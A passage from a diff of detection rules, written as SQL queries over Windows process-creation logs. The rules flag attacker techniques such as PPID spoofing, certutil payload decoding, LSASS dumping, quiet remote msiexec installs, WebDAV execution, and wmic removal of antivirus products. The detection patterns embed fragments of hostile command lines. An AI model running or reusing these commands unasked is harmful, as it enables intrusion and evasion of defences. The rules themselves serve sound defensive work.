ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "author": "Florian Roth (Nextron Systems)", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "status": "experimental", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.t1134.004" + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Service Started/Stopped Via Wmic.EXE", - "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "title": "Use of Adplus.exe", + "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", "status": "experimental", - "description": "Detects usage of wmic to start or stop a service", + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1047" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of Adplus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_service_manipulation.yml" + "filename": "proc_creation_win_lolbin_adplus.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Suspicious VBoxDrvInst.exe Parameters", + "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "File Decoded From Base64/Hex Via Certutil.EXE", - "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", - "status": "test", - "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Computer Password Change Via Ksetup.EXE", + "id": "de16d92c-c446-4d53-8938-10aeef41c8b6", + "status": "experimental", + "description": "Detects password change for the computer's domain account or host principal via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /setcomputerpassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_decode.yml" + "filename": "proc_creation_win_ksetup_password_change_computer.yml" }, { - "title": "Rundll32 With Suspicious Parent Process", - "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", - "author": "CD_ROM_", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.impact", + "attack.t1485" ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Suspicious Msiexec Quiet Install From Remote Location", + "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "status": "experimental", + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_parent_explorer.yml" + "filename": "proc_creation_win_msiexec_install_remote.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "Curl.EXE Execution With Custom UserAgent", - "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", - "status": "test", - "description": "Detects execution of curl.exe with custom useragent options", + "title": "Suspicious Cmdl32 Execution", + "id": "f37aba28-a9e6-4045-882c-d5004043b337", + "status": "experimental", + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_useragent.yml" + "filename": "proc_creation_win_lolbin_cmdl32.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", - "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", + "status": "experimental", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "Read Contents From Stdin Via Cmd.EXE", - "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "status": "experimental", - "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_stdin_redirect.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1185" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ - "attack.impact", - "attack.t1486" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "status": "test", + "description": "Detects a suspicious program execution in Outlook temp folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.initial_access", - "attack.t1133" + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", - "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", - "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", - "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dropping Of Password Filter DLL", + "id": "b7966f4a-b333-455b-8370-8ca53c229762", + "status": "test", + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE 